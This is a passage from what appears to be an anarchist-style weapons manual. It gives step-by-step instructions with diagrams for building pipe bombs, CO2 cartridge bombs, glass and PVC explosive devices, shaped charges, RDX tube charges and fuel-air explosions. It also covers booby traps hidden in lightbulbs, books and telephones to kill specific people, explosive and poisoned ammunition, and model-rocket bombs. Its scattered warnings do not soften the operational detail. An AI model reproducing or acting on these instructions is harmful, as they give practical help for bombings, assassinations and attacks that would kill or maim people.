and produce a louder and more powerful explosion when it is lit.  The finished
polumna should look like a 1/4 inch - 1/3 inch thick triangle, like the one
shown below:


             ^
            / \  ----- securely tape all corners
           /   \
          /     \
         /       \
        /         \
       /           \____________________________
      /_____________\__/__/__/__/__/__/__/__/__/  ---------- fuse


4.42     METAL CONTAINERS

     The classic pipe bomb is the best known example of a metal-contained
explosive.  Idiot anarchists take white tipped matches and cut off the match
heads.  They pound one end of a pipe closed with a hammer, pour in the white-
tipped matches, and then pound the other end closed.  This process often kills
the fool, since when he pounds the pipe closed, he could very easily cause
enough friction between the match heads to cause them to ignite and explode the
unfinished bomb.  By using pipe caps, the process is somewhat safer, and the
less stupid anarchist would never use white tipped matches in a bomb.  He would
buy two pipe caps and threaded pipe (fig. 1).  First, he would drill a hole in
one pipe cap, and put a fuse in it so that it will not come out, and so powder
will not escape during handling.  The fuse would be at least 3/4 an inch long
inside the bomb.  He would then screw the cap with the fuse in it on tightly,
possibly putting a drop of super glue on it to hold it tight.  He would then
pour his explosive powder in the bomb.  To pack it tightly, he would take a
large wad of tissue paper and, after filling the pipe to the very top, pack the
powder down, by using the paper as a ramrod tip, and pushing it with a pencil
or other wide ended object, until it would not move any further.  Finally, he
would screw the other pipe cap on, and glue it.  The tissue paper would help
prevent some of the powder from being caught in the threads of the pipe or pipe
cap from being crushed and subject to friction, which might ignite the powder,
causing an explosion during manufacture.  An assembled bomb is presented in
fig. 2.

     _________           _______________          __________
     |       |     ^^^^^^               ^^^^^^    |        |
     | |vvvvv|    |_________________________|     |vvvvvv| |
     | |                                                 | |
     | |                                                 | |
     | |                                                 | |
     | |                                                 | |
     | |           ___________________________           | |
     | |          |                           |          | |
     | |^^^^^|     vvvvvv_______________vvvvvv    |^^^^^^| |
     |_______|                                    |________|

     fig 1. Threaded pipe and endcaps.



          ________                                ________
          | _____|________________________________|_____ |
          | |__________________________________________| |
          | |: : : : |- - - - - - - - - - - - - - - - -| |
          | | tissue | - - - - - - - - - - - - - - - - |_|
          | | : : :  |- - - low order explosive - - ----------------------
          | | paper  | - - - - - - - - - - - - - - - - |-|    fuse
          | |: : : : |- - - - - - - - - - - - - - - - -| |
          | |________|_________________________________| |
          | |__________________________________________| |
          |______|                                |______|

          endcap                pipe               endcap
                                                   w/ hole

     fig. 2  Assembled pipe bomb.


     This is one possible design that a mad bomber would use.  If, however,
he did not have access to threaded pipe with endcaps, he could always use a
piece of copper or aluminum pipe, since it is easily bent into a suitable
position.  A major problem with copper piping, however, is bending and folding
it without tearing it; if too much force is used when folding and bending copper
pipe, it will split along the fold.  The safest method for making a pipe bomb
out of copper or aluminum pipe is similar to the method with pipe and endcaps.
First, one flattens one end of a copper or aluminum pipe carefully, making sure
not to tear or rip the piping.  Then, the flat end of the pipe should be folded
over at least once, if this does not rip the pipe.  A fuse hole should be
drilled in the pipe near the now closed end, and the fuse should be inserted.
Next, the bomb-builder would fill the bomb with a low order explosive, and pack
it with a large wad of tissue paper.  He would then flatten and fold the other
end of the pipe with a pair of pliers.  If he was not too dumb, he would do this
slowly, since the process of folding and bending metal gives off heat, which
could set off the explosive.  A diagram is presented below:

                                                     _______
     _______________________________________________/       |
     |                                                      |
     |                                                  o   |
     |______________________________________________        |
                                                    \_______|

     fig. 1  pipe with one end flattened and fuse hole drilled (top view)







                                                  ______
     ____________________________________________/  |  |
     |                                              |  |
     |                                            o |  |
     |___________________________________________   |  |
                                                 \__|__|

     fig. 2  pipe with one end flattened and folded up (top view)

                              ____________ fuse hole
                              |
                              v
     _________________________________________________
     |                             \ |____ |
     |                              \____| |
     |                               ______|
     |                              /
     |_____________________________/__________________

     fig. 3  pipe with flattened and folded end (side view)

                                                _________________ fuse
                                               /
                                               |
      ________   ______________________________|___   _______
      |  ____|  /     |- - - - - - - - - - -| - -  \  |___  |
      |  |_____/tissue| - - - - - - - - - - - -|- - \_____| |
      |________ paper |- - -  low order explosive -  _______|
            \         | - - - - - - - - - - - - - - /
             \_____________________________________/


     fig. 4  completed bomb, showing tissue paper packing and explosive
                (side view)


      A CO2 cartridge from a B.B gun is another excellent container for
a low-order explosive.  It has one minor disadvantage: it is time consuming
to fill.  But this can be rectified by widening the opening of the cartridge
with a pointed tool.  Then, all that would have to be done is to fill the
CO2 cartridge with any low-order explosive, or any of the fast burning fuel-
oxodizer mixtures, and insert a fuse.  These devices are commonly called
"crater makers".

     A CO2 cartridge also works well as a container for a thermit incendiary
device, but it must be modified.  The opening in the end must be widened, so
that the ignition mixture, such as powdered magnesium, does not explode.  The
fuse will ignite the powdered magnesium, which, in turn, would ignite the
thermit.
     The previously mentioned designs for explosive devices are fine for
low-order explosives, but are unsuitable for high-order explosives, since the
latter requires a shockwave to be detonated.  A design employing a smaller
low-order explosive device inside a larger device containing a high-order
explosive would probably be used.  It would look something like:


                                         _______________________ fuse
                                         |
                                         |
                                         |
      _________                          |           _________
      |   ____|__________________________|___________|____   |
      |   | * * * * * * * * * * * * * * *|* * * * * * *  |   |
      |   |  * * * * * *  high explosive | * * * * * * * |   |
      |   | * * * * * * * * * * * * * * *|* * * * * * *  |   |
      |   |  *  ______    _______________|_    ______  * |   |
      |   | * * |  __|   /   - - - - - - | \   |__  | *  |   |
      |   |  *  |  |____/   low explosive - \____|  |  * |   |
      |   | * * |_______  - - - - - - - - -  _______| *  |   |
      |   |  * * * * *  \  - - - - - - - -  /  * * * * * |   |
      |   | * * * * * *  \_________________/  * * * * *  |   |
      |   |  * * * * * * * * * * * * * * * * * * * * * * |   |
      |   | * * * * * * * * * * * * * * * * * * * * * *  |   |
      |   |  * * * * * * * * * * * * * * * * * * * * * * |   |
      |   |______________________________________________|   |
      |_______|                                      |_______|


     If the large high explosive container is small, such as a CO2 cartridge,
then a segment of a hollow radio antenna can be made into a low-order pipe bomb,
which can be fitted with a fuse, and inserted into the CO2 cartridge.


4.43     GLASS CONTAINERS

     Glass containers can be suitable for low-order explosives, but there
are problems with them.  First, a glass container can be broken relatively
easily compared to metal or plastic containers.  Secondly, in the
not-too-unlikely event of an "accident", the person making the device would
probably be seriously injured, even if the device was small.  A bomb made out of
a sample perfume bottle-sized container exploded in the hands of one boy, and he
still has pieces of glass in his hand.  He is also missing the final segment of
his ring finger, which was cut off by a sharp piece of flying glass...

     Nonetheless, glass containers such as perfume bottles can be used by
a demented individual, since such a device would not be detected by metal
detectors in an airport or other public place.  All that need be done is fill
the container, and drill a hole in the plastic cap that the fuse fits tightly
in, and screw the cap-fuse assembly on.


                    ________________________  fuse
                    |
                    |
                    |
               _____|_____
               | ___|___ |
               | >  |  < |  drill hole in cap, and insert fuse;
               | >  |  < |  be sure fuse will not come out of cap
               | >  |  < |
               |    |    |
               |         |
               |         |
               |         |  screw cap on bottle
               |         |
               |         |
               V         V





                 _________
                <         >
                <         >
                <         >
                  /     \
                 /       \
                /         \
               |           |  fill bottle with low-order explosive
               |           |
               |           |
               |           |
               |           |
               |___________|


     Large explosive devices made from glass containers are not practicle,
since glass is not an exceptionally strong container.  Much of the explosive
that is used to fill the container is wasted if the container is much larger
than a 16 oz. soda bottle.  Also, glass containers are usually unsuitable for
high explosive devices, since a glass container would probably not withstand
the explosion of the initiator; it would shatter before the high explosive was
able to detonate.


4.44     PLASTIC CONTAINERS

     Plastic containers are perhaps the best containers for explosives, since
they can be any size or shape, and are not fragile like glass.  Plastic piping
can be bought at hardware or plumbing stores, and a device much like the ones
used for metal containers can be made.  The high-order version works well with
plastic piping.  If the entire device is made out of plastic, it is not
detectable by metal detectors.  Plastic containers can usually be shaped by
heating the container, and bending it at the appropriate place.  They can be
glued closed with epoxy or other cement for plastics.  Epoxy alone can be used as
an endcap, if a wad of tissue paper is placed in the piping.  Epoxy with a drying
agent works best in this type of device.


               ||               ||
               ||               ||
               ||\_____________/||
               ||               ||
               ||     epoxy     ||
               ||_______________||
               ||               ||
               ||    tissue     ||
               ||     paper     ||
               ||_______________||
               ||***************||
               ||***************||
               ||***************||
               ||***************||
               ||** explosive **||
               ||***************||
               ||***********-----------------------  fuse
               ||***************||
               ||ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ||
               ||               ||
               ||    tissue     ||
               ||     paper     ||
               ||_______________||
               ||               ||
               ||     epoxy     ||
               || _____________ ||
               ||/             \||
               ||               ||
               ||               ||


     One end must be made first, and be allowed to dry completely before the
device can be filled with powder and fused.  Then, with another piece of tissue
paper, pack the powder tightly, and cover it with plenty of epoxy.  PVC pipe
works well for this type of device, but it cannot be used if the pipe had an
inside diameter greater than 3/4 of an inch.  Other plastic puttys can be used
int this type of device, but epoxy with a drying agent works best.


4.5     ADVANCED USES FOR EXPLOSIVES

     The techniques presented here are those that could be used by a person
who had some degree of knowledge of the use of explosives.  Some of this
information comes from demolitions books, or from military handbooks.  Advanced
uses for explosives usually involved shaped charges, or utilize a minimum amount
of explosive to do a maximum amount of damage.  They almost always involve high-
order explosives.


4.51     SHAPED CHARGES

     A shaped charge is an explosive device that, upon detonation, directs
the explosive force of detonation at a small target area.  This process can be
used to breach the strongest armor, since forces of literally millions of pounds
of pressure per square inch can be generated.  Shaped charges employ high-order
explosives, and usually electric ignition systems.  KEEP IN MIND THAT ALL
EXPLOSIVES ARE DANGEROUS, AND SHOULD NEVER BE MADE OR USED!!


               An example of a shaped charge is shown below.


                  + wire ________           _______ - wire
                                 |         |
                                 |         |
                                 |         |
 _                      _________|_________|____________
 ^                     | ________|_________|__________ |
 |                     | |       |         |         | |
 |                     | |       \ igniter /         | |
 |                     | |        \_______/          | |
 |                     | |     priming charge        | |
 |                     | |   (mercury fulminate)     | |
 |                     | |             ^             | |
 |                     | |            / \            | |
 |                     | |           /   \           | |
 |                     | |          /     \          | |
 |                     | |         /       \         | |
 |                     | |        /         \        | |
 |                     | |       /           \       | |
                       | |      /             \      | |
 8 inches high         | |     /               \     | |
                       | |    /       high      \    | |
 |                     | |   /      explosive    \   | |
 |                     | |  /        charge       \  | |
 |                     | | /                       \ | |
 |                     | |/                         \| |
 |                     | |             ^             | |
 |                     | |            / \            | |
 |                     | |           /   \           | |
 |                     | |          /     \          | |
 |                     | |         /       \         | |
 |                     | |        /         \        | |
 |                     | |       /           \       | |
 |                     | |      /             \      | |
 |                     | |     /               \     | |
 |                     | |    /                 \    | | ------- 1/2 inch
 |                     | |   /                   \   | |         thick steel
 |                     | |  /                     \  | |         pipe
 |                     | | /                       \ | |
 |                     | |/                         \| |
 |      hole for       | |                           | |     hole for
 |      screw          | |                           | |      screw
 |                     | |                           | |
 V_______   ___________| |                           | |___________  ________
 |______|   |____________|                           |_____________| |______|

                         |<------- 8 inches -------->|

     If a device such as this is screwed to a safe, for example, it would
direct most of the explosive force at a point about 1 inch away from the opening
of the pipe. The basis for shaped charges is a cone-shaped opening in the
explosive material.  This cone should have an angle of 45 degrees.  A device
such as this one could also be attached to a metal surface with a powerful
electromagnet.


4.52     TUBE EXPLOSIVES

     A variation on shaped charges, tube explosives can be used in ways that
shaped charges cannot.  If a piece of 1/2 inch plastic tubing was filled with
a sensitive high explosive such as R.D.X., and prepared as the plastic explosive
container in section 4.44, a different sort of shaped charge could be produced;
a charge that directs explosive force in a circular manner.  This type of
explosive could be wrapped around a column, or a doorknob, or a telephone pole.
The explosion would be directed in and out, and most likely destroy whatever
it was wrapped around.  In an unbent state, a tube explosive would look like
this:


               ||      ||
               ||      ||
               ||\____/||
               || epoxy||
               ||______||
               ||      ||
               ||tissue||
               || paper||
               ||______||
               ||******||
               ||******||
               ||******||
               ||******||
               ||******||
               ||******||
               ||******||
               ||******||
               ||******||
               ||******||
               ||******||
               ||******||
               ||******||
               ||******||
               || RDX  ||
               ||******||
               ||******||
               ||******||
               ||******||
               ||******||
               ||******||
               ||******||
               ||******||
               ||******||
               ||******||
               ||******||
               ||******||
               ||******||
               ||******||
               || ____ ||
               || | s| ||
               || | q| ||
               || | u| ||
               || | i| ||
               || | b| ||
               || | b| ||
               || |__| ||
               ||__||__||
               ||tissue||
               || paper||
               ||__||__||
               ||  ||  ||
               || epoxy||
               ||  ||  ||
               || _||_ ||
               ||/ || \||
               ||  ||  ||
               ||  ||  ||
                   ||_______ + wire ______________
                   |
                   |________ - wire ______________



     When an assassin or terrorist wishes to use a tube bomb, he must wrap
it around whatever thing he wishes to destroy, and epoxy the ends of the tube
bomb together.  After it dries, he/she can connect wires to the squib wires,
and detonate the bomb, with any method of electric detonation.


4.53     ATOMIZED PARTICLE EXPLOSIONS

     If a highly flammable substance is atomized, or, divided into very small
particles, and large amounts of it is burned in a confined area, an explosion
similar to that occurring in the cylinder of an automobile is produced.  The
tiny droplets of gasoline burn in the air, and the hot gasses expand rapidly,
pushing the cylinder up.  Similarly, if a gallon of gasoline was atomized and
ignited in a building, it is very possible that the expanding gassed would push
the walls of the building down.  This phenomenon is called an atomized particle
explosion.  If a person can effectively atomize a large amount of a highly
flammable substance and ignite it, he could bring down a large building, bridge,
or other structure.  Atomizing a large amount of gasoline, for example, can be
extremely difficult, unless one has the aid of a high explosive.  If a gallon
jug of gasoline was placed directly over a high explosive charge, and the charge
was detonated, the gasoline would instantly be atomized and ignited.  If this
occurred in a building, for example, an atomized particle explosion would surely
occur.  Only a small amount of high explosive would be necessary to accomplish
this feat, about 1/2 a pound of T.N.T., or 1/4 a pound of R.D.X.   Also, instead
of gasoline, powdered aluminum could be used.  It is necessary that a high
explosive be used to atomize a flammable material, since a low-order explosion
does not occur quickly enough to atomize or ignite the flammable material.


4.54     LIGHTBULB BOMBS

     An automatic reaction to walking into a dark room is to turn on the
light.  This can be fatal, if a lightbulb bomb has been placed in the overhead
light socket.  A lightbulb bomb is surprisingly easy to make.  It also comes
with its own initiator and electric ignition system.  On some lightbulbs, the
lightbulb glass can be removed from the metal base by heating the base of a
lightbulb in a gas flame, such as that of a blowtorch or gas stove.  This must
be done carefully, since the inside of a lightbulb is a vacuum.  When the glue
gets hot enough, the glass bulb can be pulled off the metal base.  On other
bulbs, it is necessary to heat the glass directly with a blowtorch or
oxy-acetylene torch.  When the bulb is red hot, a hole must be carefully poked
in the bulb, remembering the vacuum state inside the bulb.  In either case,
once the bulb and/or base has cooled down to room temperature or lower, the
bulb can be filled with an explosive material, such as black powder.  If the
glass was removed from the metal base, it must be glued back on to the base
with epoxy.  If a hole was put in the bulb, a piece of duct tape is sufficient
to hold the explosive in the in the bulb.  Then, after making sure that the
socket has no power by checking with a working lightbulb, all that need be
done is to screw the lightbulb bomb into the socket.  Such a device has been
used by terrorists or assassins with much success, since nobody can search the
room for a bomb without first turning on the light.


4.55     BOOK BOMBS

     Concealing a bomb can be extremely difficult in a day and age where
perpetrators of violence run wild.  Bags and briefcases are often searched
by authorities whenever one enters a place where an individual might intend
to set off a bomb.  One approach to disguising a bomb is to build what is
called a book bomb; an explosive device that is entirely contained inside of
a book.  Usually, a relatively large book is required, and the book must be of
the hardback variety to hide any protrusions of a bomb.  Dictionaries, law
books, large textbooks, and other such books work well.  When an individual
makes a bookbomb, he/she must choose a type of book that is appropriate for
the place where the book bomb will be placed.  The actual construction of a
book bomb can be done by anyone who possesses an electric drill and a coping
saw.  First, all of the pages of the book must be glued together.  By pouring
an entire container of water-soluble glue into a large bucket, and filling
the bucket with boiling water, a glue-water solution can be made that will
hold all of the book's pages together tightly.  After the glue-water solution
has cooled to a bearable temperature, and the solution has been stirred well,
the pages of the book must be immersed in the glue-water solution, and each
page must be thoroughly soaked.  It is extremely important that the covers of
the book do not get stuck to the pages of the book while the pages are drying.
Suspending the book by both covers and clamping the pages together in a vice
works best.  When the pages dry, after about three days to a week, a hole must
be drilled into the now rigid pages, and they should drill out much like wood.
Then, by inserting the coping saw blade through the pages and sawing out a
rectangle from the middle of the book, the individual will be left with a shell
of the book's pages.  The pages, when drilled out, should look like this:


               ________________________
               | ____________________ |
               | |                  | |
               | |                  | |
               | |                  | |
               | |                  | |
               | |                  | |
               | |                  | |
               | |                  | |
               | |                  | |
               | |                  | |
               | |                  | |
               | |                  | |
               | |__________________| |
               |______________________|

                 (book covers omitted)


     This rectangle must be securely glued to the back cover of the book.
After building his/her bomb, which usually is of the timer or radio controlled
variety, the bomber places it inside the book.  The bomb itself, and whatever
timer or detonator is used, should be packed in foam to prevent it from rolling
or shifting about.  Finally, after the timer is set, or the radio control has
been turned on, the front cover is glued closed, and the bomb is taken to its
destination.


4.56     PHONE BOMBS

     The phone bomb is an explosive device that has been used in the past
to kill or injure a specific individual.  The basic idea is simple: when the
person answers the phone, the bomb explodes.  If a small but powerful high
explosive device with a squib was placed in the phone receiver, when the
current flowed through the receiver, the squib would explode, detonating the
high explosive in the person's hand.  Nasty.  All that has to be done is
acquire a squib, and tape the receiver switch down. Unscrew the mouthpiece
cover, and remove the speaker, and connect the squib's leads where it was.
Place a high explosive putty, such as C-1 (see section 3.31) in the receiver,
and screw the cover on, making sure that the squib is surrounded by the C-1.
Hang the phone up, and leave the tape in place.  When the individual to whom
the phone belongs attempts to answer the phone, he will notice the tape, and
remove it.  This will allow current to flow through the squib.  Note that
the device will not explode by merely making a phone call; the owner of the
phone must lift up the receiver, and remove the tape.  It is highly probable
that the phone will be by his/her ear when the device explodes...


5.0     SPECIAL AMMUNITION FOR PROJECTILE WEAPONS

     Explosive and/or poisoned ammunition is an important part of a social
deviant's arsenal.  Such ammunition gives the user a distinct advantage over
individual who use normal ammunition, since a grazing hit is good enough to
kill.  Special ammunition can be made for many types of weapons, from crossbows
to shotguns.


5.1     SPECIAL AMMUNITION FOR PRIMITIVE WEAPONS

     For the purposes of this publication, we will call any weapon primitive
that does not employ burning gunpowder to propel a projectile forward.  This
means blowguns, bows and crossbows, and wristrockets.


5.11     BOW AND CROSSBOW AMMUNITION

     Bows and crossbows both fire arrows or bolts as ammunition.  It is
extremely simple to poison an arrow or bolt, but it is a more difficult matter
to produce explosive arrows or bolts.  If, however, one can acquire aluminum
piping that is the same diameter of an arrow or crossbow bolt, the entire
segment of piping can be converted into an explosive device that detonates
upon impact, or with a fuse.  All that need be done is find an aluminum tube
of the right length and diameter, and plug the back end with tissue paper and
epoxy.  Fill the tube with any type of low-order explosive or sensitive high-
order explosive up to about 1/2 an inch from the top.  Cut a slot in the piece
of tubing, and carefully squeeze the top of the tube into a round point, making
sure to leave a small hole.  Place a no. 11 percussion cap over the hole, and
secure it with super glue.  Finally, wrap the end of the device with electrical
or duct tape, and make fins out of tape.  Or, fins can be bought at a sporting
goods store, and glued to the shaft.  The finished product should look like:

               _____
               |   | ---------- no. 11 percussion cap
               ||*||
                |*|
                |*|
                |*|
                |*|
                |*|
                |*| ----------- aluminum piping
                |*|
                |e|
                |x|
                |p|
                |l|
                |o|
                |s|
                |i|
                |v|
                |e|
                |*|
                |*|
                |*|
                |*|
                |*|
                |*|
                |*|
               /|_|\
              / |t| \
              | |p| |
              | |_| |
              | |e| | -------- fins
              | |p| |
              | |y| |
              |_|_|_|
                |_|


     tp: tissue paper

     epy: epoxy


     When the arrow or bolt strikes a hard surface, the percussion cap
explodes, igniting or detonating the explosive.


5.12     SPECIAL AMMUNITION FOR BLOWGUNS

     The blowgun is an interesting weapon which has several advantages.
A blowgun can be extremely accurate, concealable, and deliver an explosive
or poisoned projectile.  The manufacture of an explosive dart or projectile
is not difficult.  Perhaps the most simple design for such involves the use
of a pill capsule, such as the kind that are taken for headaches or allergies.
Such a capsule could easily be opened, and the medicine removed.  Next, the
capsule would be re-filled with an impact-sensitive explosive.  An additional
high explosive charge could be placed behind the impact-sensitive explosive,
if one of the larger capsules were used.  Finally, the explosive capsule would
be reglued back together, and a tassel or cotton would be glued to the end
containing the high explosive, to insure that the impact-detonating explosive
struck the target first.  Such a device would probably be about 3/4 of an inch
long, not including the tassel or cotton, and look something like this:


                  ____________________
                 /mercury |           \-----------------------
                (fulminate|   R.D.X.   )---------------------- } tassels
                 \________|___________/-----------------------


5.13     SPECIAL AMMUNITION FOR WRISTROCKETS AND SLINGSHOTS

     A modern wristrocket is a formidable weapon.  It can throw a shooter
marble about 500 ft. with reasonable accuracy.  Inside of 200 ft., it could well
be lethal to a man or animal, if it struck in a vital area.  Because of the
relatively large sized projectile that can be used in a wristrocket, the
wristrocket can be adapted to throw relatively powerful explosive projectiles.
A small segment of aluminum pipe could be made into an impact-detonating device
by filling it with an impact-sensitive explosive material.  Also, such a pipe
could be filled with a low-order explosive, and fitted with a fuse, which would
be lit before the device was shot.  One would have to make sure that the fuse
was of sufficient length to insure that the device did not explode before it
reached its intended target.  Finally, .22 caliber caps, such as the kind that
are used in .22 caliber blank guns, make excellent exploding ammunition for
wristrockets, but they must be used at a relatively close range, because of
their light weight.


5.2     SPECIAL AMMUNITION FOR FIREARMS

     When special ammunition is used in combination with the power and
rapidity of modern firearms, it becomes very easy to take on a small army with
a single weapon.  It is possible to buy explosive ammunition, but that can be
difficult to do.  Such ammunition can also be manufactured in the home.  There
is, however, a risk involved with modifying any ammunition.  If the ammunition
is modified incorrectly, in such a way that it makes the bullet even the
slightest bit wider, an explosion in the barrel of the weapon will occur.  For
this reason, NOBODY SHOULD EVER ATTEMPT TO MANUFACTURE SUCH AMMUNITION.


5.21     SPECIAL AMMUNITION FOR HANDGUNS

     If an individual wished to produce explosive ammunition for his/her
handgun, he/she could do it, provided that the person had an impact-sensitive
explosive and a few simple tools.  One would first purchase all lead bullets,
and then make or acquire an impact-detonating explosive.  By drilling a hole
in a lead bullet with a drill, a space could be created for the placement of
an explosive.  After filling the hole with an explosive, it would be sealed
in the bullet with a drop of hot wax from a candle.  A diagram of a completed
exploding bullet is shown below.


                      _o_ ------------ drop of wax
                     /|*|\
                    | |*|-|----------- impact-sensitive explosive
                    | |_| |
                    |_____|


     This hollow space design also works for putting poison in bullets.


5.22     SPECIAL AMMUNITION FOR SHOTGUNS

     Because of their large bore and high power, it is possible to create
some extremely powerful special ammunition for use in shotguns.  If a shotgun
shell is opened at the top, and the shot is removed, the shell can be re-closed.
Then, if one can find a very smooth, lightweight wooden dowel that is close to
the bore width of the shotgun, a person can make several types of
shotgun-launched weapons.  Insert the dowel in the barrel of the shotgun with the
shell without the shot in the firing chamber.  Mark the dowel about six inches
away from the end of the barrel, and remove it from the barrel.  Next, decide
what type of explosive or incendiary device is to be used.  This device can be a
chemical fire bottle (see sect. 3.43), a pipe bomb (sect 4.42), or a thermit bomb
(sect 3.41 and 4.42).  After the device is made, it must be securely attached to
the  dowel.  When this is done, place the dowel back in the shotgun.  The bomb or
incendiary device should be on the end of the dowel.  Make sure that the device
has a long enough fuse, light the fuse, and fire the shotgun.  If the projectile
is not too heavy, ranges of up to 300 ft are possible.  A diagram of a shotgun
projectile is shown below.



               ____
               ||  |
               ||  |
               ||  | ----- bomb, securely taped to dowel
               ||  |
               ||__|
               || |
               || | ------- fuse
               || |
               ||
               ||
               ||
               || --------- dowel
               ||
               ||
               ||
               ||
               ||
               || --------- insert this end into shotgun


5.3     SPECIAL AMMUNITION FOR COMPRESSED AIR/GAS WEAPONS

     This section deals with the manufacture of special ammunition for
compressed air or compressed gas weapons, such as pump B.B guns, CO2 B.B guns,
and .22 cal pellet guns.  These weapons, although usually thought of as kids
toys, can be made into rather dangerous weapons.


5.31     SPECIAL AMMUNITION FOR B.B GUNS

     A B.B gun, for this manuscript, will be considered any type of rifle
or pistol that uses compressed air or CO2 gas to fire a projectile with a caliber

of .177, either B.B, or lead pellet.  Such guns can have almost as high a muzzle
velocity as a bullet-firing rifle.  Because of the speed at which a .177 caliber
projectile flies, an impact detonating projectile can easily be made that has a
caliber of .177.  Most ammunition for guns of greater than .22 caliber use
primers to ignite the powder in the bullet.  These primers can be bought at gun
stores, since many people like to reload their own bullets.  Such primers
detonate when struck by the firing pin of a gun.  They will also detonate if
they are thrown at a hard surface at a great speed.  Usually, they will also fit
in the barrel of a .177 caliber gun.  If they are inserted flat end first, they
will detonate when the gun is fired at a hard surface.  If such a primer is
attached to a piece of thin metal tubing, such as that used in an antenna, the
tube can be filled with an explosive, be sealed, and fired from a B.B gun.  A
diagram of such a projectile appears below.


             _____ primers _______
            |                    |
            |                    |
            |                    |
            V                    V
          ______                ______
          | ________________________ |-------------------
          | ****** explosive ******* |------------------- } tassel or
          | ________________________ |-------------------   cotton
          |_____                _____|-------------------
                    ^
                    |
                    |
                    |_______ antenna tubing

     The front primer is attached to the tubing with a drop of super glue.
The tubing is then filled with an explosive, and the rear primer is glued on.
Finally, a tassel, or a small piece of cotton is glued to the rear primer, to
insure that the projectile strikes on the front primer.  The entire projectile
should be about 3/4 of an inch long.


5.32     SPECIAL AMMUNITION FOR .22 CALIBER PELLET GUNS

     A .22 caliber pellet gun usually is equivalent to a .22 cal rifle, at
close ranges.  Because of this, relatively large explosive projectiles can be
adapted for use with .22 caliber air rifles.  A design similar to that used in
section 5.12 is suitable, since some capsules are about .22 caliber or smaller.
Or, a design similar to that in section 5.31 could be used, only one would have
to purchase black powder percussion caps, instead of ammunition primers, since
there are percussion caps that are about .22 caliber.  A #11 cap is too small,
but anything larger will do nicely.


6.0     ROCKETS AND CANNONS

     Rockets and cannon are generally thought of as heavy artillery.
Perpetrators of violence do not usually employ such devices, because they are
difficult or impossible to acquire.  They are not, however, impossible to make.
Any individual who can make or buy black powder or pyrodex can make such things.
A terrorist with a cannon or large rocket is, indeed, something to fear.


6.1     ROCKETS

     Rockets were first developed by the Chinese several hundred years
before Christ.  They were used for entertainment, in the form of fireworks.
They were not usually used for military purposes because they were inaccurate,
expensive, and unpredictable.  In modern times, however, rockets are used
constantly by the military, since they are cheap, reliable, and have no recoil.
Perpetrators of violence, fortunately, cannot obtain military rockets, but they
can make or buy rocket engines.  Model rocketry is a popular hobby of the space
age, and to launch a rocket, an engine is required.  Estes, a subsidiary of
Damon, is the leading manufacturer of model rockets and rocket engines.  Their
most powerful engine, the "D" engine, can develop almost 12 lbs. of thrust;
enough to send a relatively large explosive charge a significant distance.
Other companies, such as Centuri, produce even larger rocket engines, which
develop up to 30 lbs. of thrust.  These model rocket engines are quite reliable,
and are designed to be fired electrically.  Most model rocket engines have
three basic sections.  The diagram below will help explain them.


     __________________________________________________________
     |_________________________________________________________| -- cardboard
      \  clay  | - - - - - - - - - - | * * * | . . . .|c|            casing
       \_______|  - - - - - - - - -  | * * * |  . . . |l|
        ______ _ - - - thrust - - -  | smoke | eject  |a|
       / clay  |  - - - - - - - - -  | * * * | . . . .|y|
      /________|_____________________|_______|________|_|_______
     |_________________________________________________________| -- cardboard
                                              casing


     The clay nozzle is where the igniter is inserted.  When the area labeled
"thrust" is ignited, the "thrust" material, usually a large single grain of a
propellant such as black powder or pyrodex, burns, forcing large volumes of hot,
rapidly expanding gasses out the narrow nozzle, pushing the rocket forward.
After the material has been consumed, the smoke section of the engine is
ignited.  It is usually a slow-burning material, similar to black powder that
has had various compounds added to it to produce visible smoke, usually black,
white, or yellow in color.  This section exists so that the rocket will be seen
when it reaches its maximum altitude, or apogee.  When it is burned up, it
ignites the ejection charge, labeled "eject".  The ejection charge is finely
powdered black powder.  It burns very rapidly, exploding, in effect.  The
explosion of the ejection charge pushes out the parachute of the model rocket.
It could also be used to ignite the fuse of a bomb...


     Rocket engines have their own peculiar labeling system.  Typical engine
labels are: 1/4A-2T, 1/2A-3T, A8-3, B6-4, C6-7, and D12-5.  The letter is an
indicator of the power of an engine.  "B" engines are twice as powerful as "A"
engines, and "C" engines are twice as powerful as "B" engines, and so on.  The
number following the letter is the approximate thrust of the engine, in pounds.
the final number and letter is the time delay, from the time that the thrust
period of engine burn ends until the ejection charge fires; "3T" indicates a
3 second delay.


NOTE: an extremely effective rocket propellant can be made by mixing aluminum
      dust with ammonium perchlorate and a very small amount of iron oxide.
      The mixture is bound together by an epoxy.


6.11     BASIC ROCKET BOMB

     A rocket bomb is simply what the name implies: a bomb that is delivered
to its target by means of a rocket.  Most people who would make such a device
would use a model rocket engine to power the device.  By cutting fins from balsa
wood and gluing them to a large rocket engine, such as the Estes "C" engine, a
basic rocket could be constructed.  Then, by attaching a "crater maker", or CO2
cartridge bomb to the rocket, a bomb would be added.  To insure that the fuse of
the "crater maker" (see sect. 4.42) ignited, the clay over the ejection charge
of the engine should be scraped off with a plastic tool.  The fuse of the bomb
should be touching the ejection charge, as shown below.



          ____________ rocket engine
          |                         _________ crater maker
          |                         |
          |                         |
          V                         |
     _______________________________V_
     |_______________________________|  ______________________
      \   | - - - - - -|***|::::|      /# # # # # # # # # # # \
       \__| - - - - - -|***|::::|  ___/  # # # # # # # # # # # \
        __  - - - - - -|***|::::|---fuse--- # #  explosive  # # )
       /  | - - - - - -|***|::::|  ___   # # # # # # # # # # # /
      /___|____________|___|____|____ \_______________________/
     |_______________________________|


     thrust> - - - - - -
     smoke>  ***
     ejection charge> ::::


     Duct tape is the best way to attach the crater maker to the rocket
engine.  Note in the diagram the absence of the clay over the ejection charge
Many different types of explosive payloads can be attached to the rocket, such as

a high explosive, an incendiary device, or a chemical fire bottle.



     Either four or three fins must be glued to the rocket engine to insure
that the rocket flies straight.  The fins should look like this:


          |\
          | \
          |  \
          |   \  <--------- glue this to rocket engine
          |    \
          |     \
          |      \
          |       |
          |       |
          |       |
  leading edge    |
   ------->       |
          |       |
          |       |  trailing edge
          |       |    <--------
          |       |
          |       |
          |       |
          |       |
           \_____/


     The leading edge and trailing edge should be sanded with sandpaper so
that they are rounded.  This will help make the rocket fly straight.  A two
inch long section of a plastic straw can be attached to the rocket to launch it
from.  A clothes hanger can be cut and made into a launch rod.  The segment of
a plastic straw should be glued to the rocket engine adjacent to one of the fins
of the rocket.  A front view of a completed rocket bomb is shown below.

                              |
           fin                | <------ fin
            |                 |           |
            |                 |           |
            |               __|__         |
            V              /     \        V
           ---------------|       |---------------
                           \_____/
                              |o <----------- segment of plastic straw
                              |
                              |
                              | <------ fin
                              |
                              |

